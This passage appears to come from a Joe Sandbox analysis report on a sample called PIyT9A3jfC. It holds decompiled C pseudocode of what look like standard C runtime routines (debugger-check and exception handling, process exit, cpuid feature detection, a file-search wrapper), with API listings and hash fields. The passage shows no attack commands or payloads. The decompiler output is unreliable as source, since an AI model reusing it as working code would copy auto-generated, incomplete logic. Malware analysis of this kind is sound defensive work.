                                                                                                                                                                                                                                                                      				E0118F070(_t67,  &_v804, 0, 0x50);
                                                                                                                                                                                                                                                                      				E0118F070(_t67,  &_v724, 0, 0x2cc);
                                                                                                                                                                                                                                                                      				_v812 =  &_v804;
                                                                                                                                                                                                                                                                      				_t47 =  &_v724;
                                                                                                                                                                                                                                                                      				_v808 = _t47;
                                                                                                                                                                                                                                                                      				_v548 = _t47;
                                                                                                                                                                                                                                                                      				_v552 = _t62;
                                                                                                                                                                                                                                                                      				_v556 = _t66;
                                                                                                                                                                                                                                                                      				_v560 = _t61;
                                                                                                                                                                                                                                                                      				_v564 = _t69;
                                                                                                                                                                                                                                                                      				_v568 = _t67;
                                                                                                                                                                                                                                                                      				_v524 = ss;
                                                                                                                                                                                                                                                                      				_v536 = cs;
                                                                                                                                                                                                                                                                      				_v572 = ds;
                                                                                                                                                                                                                                                                      				_v576 = es;
                                                                                                                                                                                                                                                                      				_v580 = fs;
                                                                                                                                                                                                                                                                      				_v584 = gs;
                                                                                                                                                                                                                                                                      				asm("pushfd");
                                                                                                                                                                                                                                                                      				_pop( *_t22);
                                                                                                                                                                                                                                                                      				_t23 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                                      				_v540 =  *_t23;
                                                                                                                                                                                                                                                                      				_t25 =  &_v0; // 0x1189cb7
                                                                                                                                                                                                                                                                      				_t49 = _t25;
                                                                                                                                                                                                                                                                      				_v528 = _t49;
                                                                                                                                                                                                                                                                      				_v724 = 0x10001;
                                                                                                                                                                                                                                                                      				_t28 = _t49 - 4; // 0x53ff8bcc
                                                                                                                                                                                                                                                                      				_v544 =  *_t28;
                                                                                                                                                                                                                                                                      				_t30 =  &_a8; // 0xdb33f08b
                                                                                                                                                                                                                                                                      				_v804 =  *_t30;
                                                                                                                                                                                                                                                                      				_t32 =  &_a12; // 0x21d70ca1
                                                                                                                                                                                                                                                                      				_v800 =  *_t32;
                                                                                                                                                                                                                                                                      				_t34 =  &_v0; // 0x15ff5756
                                                                                                                                                                                                                                                                      				_v792 =  *_t34;
                                                                                                                                                                                                                                                                      				_t68 = IsDebuggerPresent();
                                                                                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                                                      				_t36 =  &_v812; // 0x118998b
                                                                                                                                                                                                                                                                      				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                      					_t38 =  &_a4; // 0x1199064
                                                                                                                                                                                                                                                                      					_push( *_t38);
                                                                                                                                                                                                                                                                      					E0118DF2A(_t57);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t39 =  &_v8; // 0x987
                                                                                                                                                                                                                                                                      				return E0118DC5F( *_t39 ^ _t70);
                                                                                                                                                                                                                                                                      			}





































                                                                                                                                                                                                                                                                      0x011895a0
                                                                                                                                                                                                                                                                      0x011895a0
                                                                                                                                                                                                                                                                      0x011895a0
                                                                                                                                                                                                                                                                      0x011895a0
                                                                                                                                                                                                                                                                      0x011895ab
                                                                                                                                                                                                                                                                      0x011895b0
                                                                                                                                                                                                                                                                      0x011895b2
                                                                                                                                                                                                                                                                      0x011895ba
                                                                                                                                                                                                                                                                      0x011895bc
                                                                                                                                                                                                                                                                      0x011895bf
                                                                                                                                                                                                                                                                      0x011895c4
                                                                                                                                                                                                                                                                      0x011895c4
                                                                                                                                                                                                                                                                      0x011895d0
                                                                                                                                                                                                                                                                      0x011895e3
                                                                                                                                                                                                                                                                      0x011895f1
                                                                                                                                                                                                                                                                      0x011895f7
                                                                                                                                                                                                                                                                      0x011895fd
                                                                                                                                                                                                                                                                      0x01189603
                                                                                                                                                                                                                                                                      0x01189609
                                                                                                                                                                                                                                                                      0x0118960f
                                                                                                                                                                                                                                                                      0x01189615
                                                                                                                                                                                                                                                                      0x0118961b
                                                                                                                                                                                                                                                                      0x01189621
                                                                                                                                                                                                                                                                      0x01189627
                                                                                                                                                                                                                                                                      0x0118962e
                                                                                                                                                                                                                                                                      0x01189635
                                                                                                                                                                                                                                                                      0x0118963c
                                                                                                                                                                                                                                                                      0x01189643
                                                                                                                                                                                                                                                                      0x0118964a
                                                                                                                                                                                                                                                                      0x01189651
                                                                                                                                                                                                                                                                      0x01189652
                                                                                                                                                                                                                                                                      0x01189658
                                                                                                                                                                                                                                                                      0x0118965b
                                                                                                                                                                                                                                                                      0x01189661
                                                                                                                                                                                                                                                                      0x01189661
                                                                                                                                                                                                                                                                      0x01189664
                                                                                                                                                                                                                                                                      0x0118966a
                                                                                                                                                                                                                                                                      0x01189674
                                                                                                                                                                                                                                                                      0x01189677
                                                                                                                                                                                                                                                                      0x0118967d
                                                                                                                                                                                                                                                                      0x01189680
                                                                                                                                                                                                                                                                      0x01189686
                                                                                                                                                                                                                                                                      0x01189689
                                                                                                                                                                                                                                                                      0x0118968f
                                                                                                                                                                                                                                                                      0x01189692
                                                                                                                                                                                                                                                                      0x011896a0
                                                                                                                                                                                                                                                                      0x011896a2
                                                                                                                                                                                                                                                                      0x011896a8
                                                                                                                                                                                                                                                                      0x011896b7
                                                                                                                                                                                                                                                                      0x011896c3
                                                                                                                                                                                                                                                                      0x011896c3
                                                                                                                                                                                                                                                                      0x011896c6
                                                                                                                                                                                                                                                                      0x011896cb
                                                                                                                                                                                                                                                                      0x011896cc
                                                                                                                                                                                                                                                                      0x011896da

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 01189698
                                                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011896A2
                                                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0118998B,?,?,?,?,?,00000000), ref: 011896AF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                      • Opcode ID: 12a3a091d60a126507b6014303bb4cb9a3ec0c0f19ae63bee89864612a7067ce
                                                                                                                                                                                                                                                                      • Instruction ID: 57876882040c88914ea422e440410bb4dd8d30748b33c5fcb9e9b3824c3ec372
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12a3a091d60a126507b6014303bb4cb9a3ec0c0f19ae63bee89864612a7067ce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9131D57490121D9BCB25EF68D88879CBBB8BF18314F5082EAE41CA7250E7749B818F45
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118C1C9(int _a4) {
                                                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(E0118AAF2(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                      					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0118C24E(_t14, _t16, _a4);
                                                                                                                                                                                                                                                                      				ExitProcess(_a4);
                                                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                                                      0x0118c1d5
                                                                                                                                                                                                                                                                      0x0118c1f1
                                                                                                                                                                                                                                                                      0x0118c1f1
                                                                                                                                                                                                                                                                      0x0118c1fa
                                                                                                                                                                                                                                                                      0x0118c203

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0118A67C,?,0118C19F,0118A67C,011DA700,0000000C,0118C2F6,0118A67C,00000002,00000000,?,0118A67C), ref: 0118C1EA
                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0118C19F,0118A67C,011DA700,0000000C,0118C2F6,0118A67C,00000002,00000000,?,0118A67C), ref: 0118C1F1
                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0118C203
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                      • Opcode ID: 637e075d5fe788e4802a3a5518462fb277e9189d4361ec0a896e807e61899eb8
                                                                                                                                                                                                                                                                      • Instruction ID: b846c78722e08736c8a12bba89eb208e8e0b7ee99dea1f6691b5d8cf7b9e3455
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 637e075d5fe788e4802a3a5518462fb277e9189d4361ec0a896e807e61899eb8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E04631000549EBCF297FA8DA48AD87B2DEF54249F048028FD299B521CB35EC82CFA0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                                                                                      			E0118E0BE(intOrPtr __edx) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed char _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                                                                                      				signed int _t62;
                                                                                                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                                                                                      				signed int _t68;
                                                                                                                                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                                                                                                                                      				intOrPtr* _t75;
                                                                                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                                                                                                                                      				intOrPtr* _t86;
                                                                                                                                                                                                                                                                      				signed int _t91;
                                                                                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t84 = __edx;
                                                                                                                                                                                                                                                                      				 *0x121e4ec =  *0x121e4ec & 0x00000000;
                                                                                                                                                                                                                                                                      				 *0x121dd80 =  *0x121dd80 | 1;
                                                                                                                                                                                                                                                                      				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                                                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                                      				 *0x121dd80 =  *0x121dd80 | 0x00000002;
                                                                                                                                                                                                                                                                      				 *0x121e4ec = 1;
                                                                                                                                                                                                                                                                      				_t86 =  &_v48;
                                                                                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                                                                                      				asm("cpuid");
                                                                                                                                                                                                                                                                      				_pop(_t73);
                                                                                                                                                                                                                                                                      				 *_t86 = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t86 + 4)) = 1;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t86 + 8)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                      				_v16 = _v48;
                                                                                                                                                                                                                                                                      				_v8 = _v36 ^ 0x49656e69;
                                                                                                                                                                                                                                                                      				_v12 = _v40 ^ 0x6c65746e;
                                                                                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                                                                                      				asm("cpuid");
                                                                                                                                                                                                                                                                      				_t75 =  &_v48;
                                                                                                                                                                                                                                                                      				 *_t75 = 1;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t75 + 4)) = _t73;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t75 + 8)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                      				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
                                                                                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                                                                                      					_t91 =  *0x121e4f0; // 0x2
                                                                                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                                                                                      					_v32 = _v36;
                                                                                                                                                                                                                                                                      					_t59 = _v40;
                                                                                                                                                                                                                                                                      					_v8 = _t59;
                                                                                                                                                                                                                                                                      					_v28 = _t59;
                                                                                                                                                                                                                                                                      					if(_v16 >= 7) {
                                                                                                                                                                                                                                                                      						_t65 = 7;
                                                                                                                                                                                                                                                                      						_push(_t75);
                                                                                                                                                                                                                                                                      						asm("cpuid");
                                                                                                                                                                                                                                                                      						_t77 =  &_v48;
                                                                                                                                                                                                                                                                      						 *_t77 = _t65;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t77 + 8)) = 0;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
                                                                                                                                                                                                                                                                      						_t66 = _v44;
                                                                                                                                                                                                                                                                      						_v24 = _t66;
                                                                                                                                                                                                                                                                      						_t59 = _v8;
                                                                                                                                                                                                                                                                      						if((_t66 & 0x00000200) != 0) {
                                                                                                                                                                                                                                                                      							 *0x121e4f0 = _t91 | 0x00000002;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if((_t59 & 0x00100000) != 0) {
                                                                                                                                                                                                                                                                      						 *0x121dd80 =  *0x121dd80 | 0x00000004;
                                                                                                                                                                                                                                                                      						 *0x121e4ec = 2;
                                                                                                                                                                                                                                                                      						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                      							asm("xgetbv");
                                                                                                                                                                                                                                                                      							_v20 = _t59;
                                                                                                                                                                                                                                                                      							_v16 = _t84;
                                                                                                                                                                                                                                                                      							if((_v20 & 0x00000006) == 6 && 0 == 0) {
                                                                                                                                                                                                                                                                      								_t62 =  *0x121dd80; // 0x2f
                                                                                                                                                                                                                                                                      								_t63 = _t62 | 0x00000008;
                                                                                                                                                                                                                                                                      								 *0x121e4ec = 3;
                                                                                                                                                                                                                                                                      								 *0x121dd80 = _t63;
                                                                                                                                                                                                                                                                      								if((_v24 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                                      									 *0x121e4ec = 5;
                                                                                                                                                                                                                                                                      									 *0x121dd80 = _t63 | 0x00000020;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t68 = _v48 & 0x0fff3ff0;
                                                                                                                                                                                                                                                                      				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
                                                                                                                                                                                                                                                                      					_t94 =  *0x121e4f0; // 0x2
                                                                                                                                                                                                                                                                      					_t91 = _t94 | 0x00000001;
                                                                                                                                                                                                                                                                      					 *0x121e4f0 = _t91;
                                                                                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}



























                                                                                                                                                                                                                                                                      0x0118e0be
                                                                                                                                                                                                                                                                      0x0118e0c1
                                                                                                                                                                                                                                                                      0x0118e0cf
                                                                                                                                                                                                                                                                      0x0118e0de
                                                                                                                                                                                                                                                                      0x0118e25b
                                                                                                                                                                                                                                                                      0x0118e261
                                                                                                                                                                                                                                                                      0x0118e261
                                                                                                                                                                                                                                                                      0x0118e0e4
                                                                                                                                                                                                                                                                      0x0118e0ea
                                                                                                                                                                                                                                                                      0x0118e0f5
                                                                                                                                                                                                                                                                      0x0118e0fb
                                                                                                                                                                                                                                                                      0x0118e0fe
                                                                                                                                                                                                                                                                      0x0118e0ff
                                                                                                                                                                                                                                                                      0x0118e103
                                                                                                                                                                                                                                                                      0x0118e104
                                                                                                                                                                                                                                                                      0x0118e106
                                                                                                                                                                                                                                                                      0x0118e109
                                                                                                                                                                                                                                                                      0x0118e10e
                                                                                                                                                                                                                                                                      0x0118e117
                                                                                                                                                                                                                                                                      0x0118e128
                                                                                                                                                                                                                                                                      0x0118e133
                                                                                                                                                                                                                                                                      0x0118e139
                                                                                                                                                                                                                                                                      0x0118e13a
                                                                                                                                                                                                                                                                      0x0118e142
                                                                                                                                                                                                                                                                      0x0118e148
                                                                                                                                                                                                                                                                      0x0118e14a
                                                                                                                                                                                                                                                                      0x0118e14d
                                                                                                                                                                                                                                                                      0x0118e150
                                                                                                                                                                                                                                                                      0x0118e153
                                                                                                                                                                                                                                                                      0x0118e198
                                                                                                                                                                                                                                                                      0x0118e198
                                                                                                                                                                                                                                                                      0x0118e19e
                                                                                                                                                                                                                                                                      0x0118e1a5
                                                                                                                                                                                                                                                                      0x0118e1a8
                                                                                                                                                                                                                                                                      0x0118e1ab
                                                                                                                                                                                                                                                                      0x0118e1ae
                                                                                                                                                                                                                                                                      0x0118e1b1
                                                                                                                                                                                                                                                                      0x0118e1b5
                                                                                                                                                                                                                                                                      0x0118e1b8
                                                                                                                                                                                                                                                                      0x0118e1b9
                                                                                                                                                                                                                                                                      0x0118e1be
                                                                                                                                                                                                                                                                      0x0118e1c1
                                                                                                                                                                                                                                                                      0x0118e1c3
                                                                                                                                                                                                                                                                      0x0118e1c6
                                                                                                                                                                                                                                                                      0x0118e1c9
                                                                                                                                                                                                                                                                      0x0118e1cc
                                                                                                                                                                                                                                                                      0x0118e1d4
                                                                                                                                                                                                                                                                      0x0118e1d7
                                                                                                                                                                                                                                                                      0x0118e1da
                                                                                                                                                                                                                                                                      0x0118e1df
                                                                                                                                                                                                                                                                      0x0118e1df
                                                                                                                                                                                                                                                                      0x0118e1da
                                                                                                                                                                                                                                                                      0x0118e1ec
                                                                                                                                                                                                                                                                      0x0118e1ee
                                                                                                                                                                                                                                                                      0x0118e1f5
                                                                                                                                                                                                                                                                      0x0118e204
                                                                                                                                                                                                                                                                      0x0118e20f
                                                                                                                                                                                                                                                                      0x0118e212
                                                                                                                                                                                                                                                                      0x0118e215
                                                                                                                                                                                                                                                                      0x0118e226
                                                                                                                                                                                                                                                                      0x0118e22c
                                                                                                                                                                                                                                                                      0x0118e231
                                                                                                                                                                                                                                                                      0x0118e234
                                                                                                                                                                                                                                                                      0x0118e242
                                                                                                                                                                                                                                                                      0x0118e247
                                                                                                                                                                                                                                                                      0x0118e24c
                                                                                                                                                                                                                                                                      0x0118e256
                                                                                                                                                                                                                                                                      0x0118e256
                                                                                                                                                                                                                                                                      0x0118e247
                                                                                                                                                                                                                                                                      0x0118e226
                                                                                                                                                                                                                                                                      0x0118e204
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118e1ec
                                                                                                                                                                                                                                                                      0x0118e158
                                                                                                                                                                                                                                                                      0x0118e162
                                                                                                                                                                                                                                                                      0x0118e187
                                                                                                                                                                                                                                                                      0x0118e18d
                                                                                                                                                                                                                                                                      0x0118e190
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0118E0D7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                                      • Opcode ID: e3681f847c06596e396fdc196a6f9fbbe876bb04a4868da61153147d5084477c
                                                                                                                                                                                                                                                                      • Instruction ID: 9116cd85c81aac5452abc00f6628ff10cb54e35c3ef06e3e9297b5004e67b0a3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3681f847c06596e396fdc196a6f9fbbe876bb04a4868da61153147d5084477c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D519DB1D01219DFEB29DFA9E9896AEBBF5FB48314F15C06AE805E7244D7349500CF50
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                                                                                                                      			E01191989(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				WCHAR* _v36;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v556;
                                                                                                                                                                                                                                                                      				intOrPtr _v558;
                                                                                                                                                                                                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                                                                                                      				intOrPtr* _v608;
                                                                                                                                                                                                                                                                      				signed int _v612;
                                                                                                                                                                                                                                                                      				signed int _v616;
                                                                                                                                                                                                                                                                      				intOrPtr _v644;
                                                                                                                                                                                                                                                                      				intOrPtr _v648;
                                                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                                                      				signed int _t45;
                                                                                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                                                                                      				signed char _t53;
                                                                                                                                                                                                                                                                      				signed int _t62;
                                                                                                                                                                                                                                                                      				void* _t64;
                                                                                                                                                                                                                                                                      				union _FINDEX_INFO_LEVELS _t66;
                                                                                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                                                                                      				void* _t84;
                                                                                                                                                                                                                                                                      				signed int _t85;
                                                                                                                                                                                                                                                                      				void* _t89;
                                                                                                                                                                                                                                                                      				WCHAR* _t90;
                                                                                                                                                                                                                                                                      				intOrPtr* _t94;
                                                                                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                                                                                      				void* _t99;
                                                                                                                                                                                                                                                                      				signed int _t100;
                                                                                                                                                                                                                                                                      				intOrPtr* _t104;
                                                                                                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                                                                                      				intOrPtr _t111;
                                                                                                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                                                                                      				signed int _t117;
                                                                                                                                                                                                                                                                      				void* _t118;
                                                                                                                                                                                                                                                                      				union _FINDEX_INFO_LEVELS _t119;
                                                                                                                                                                                                                                                                      				void* _t124;
                                                                                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                                                                                      				signed int _t126;
                                                                                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                                                                                      				void* _t133;
                                                                                                                                                                                                                                                                      				signed int _t134;
                                                                                                                                                                                                                                                                      				void* _t135;
                                                                                                                                                                                                                                                                      				void* _t136;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                                                      				_t94 = _a4;
                                                                                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                                                                                      				_t2 = _t94 + 2; // 0x2
                                                                                                                                                                                                                                                                      				_t110 = _t2;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					_t40 =  *_t94;
                                                                                                                                                                                                                                                                      					_t94 = _t94 + 2;
                                                                                                                                                                                                                                                                      				} while (_t40 != 0);
                                                                                                                                                                                                                                                                      				_t117 = _a12;
                                                                                                                                                                                                                                                                      				_t97 = (_t94 - _t110 >> 1) + 1;
                                                                                                                                                                                                                                                                      				_v8 = _t97;
                                                                                                                                                                                                                                                                      				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
                                                                                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                                                                                      					_t5 = _t117 + 1; // 0x1
                                                                                                                                                                                                                                                                      					_t89 = _t5 + _t97;
                                                                                                                                                                                                                                                                      					_t124 = E0118A67D(_t97, _t89, 2);
                                                                                                                                                                                                                                                                      					_pop(_t99);
                                                                                                                                                                                                                                                                      					__eflags = _t117;
                                                                                                                                                                                                                                                                      					if(_t117 == 0) {
                                                                                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                                                                                      						_push(_v8);
                                                                                                                                                                                                                                                                      						_t89 = _t89 - _t117;
                                                                                                                                                                                                                                                                      						_t45 = E0118BE98(_t99, _t124 + _t117 * 2, _t89, _a4);
                                                                                                                                                                                                                                                                      						_t134 = _t133 + 0x10;
                                                                                                                                                                                                                                                                      						__eflags = _t45;
                                                                                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_t82 = E01191C02(_a16, __eflags, _t124);
                                                                                                                                                                                                                                                                      							E0118A6DA(0);
                                                                                                                                                                                                                                                                      							_t84 = _t82;
                                                                                                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
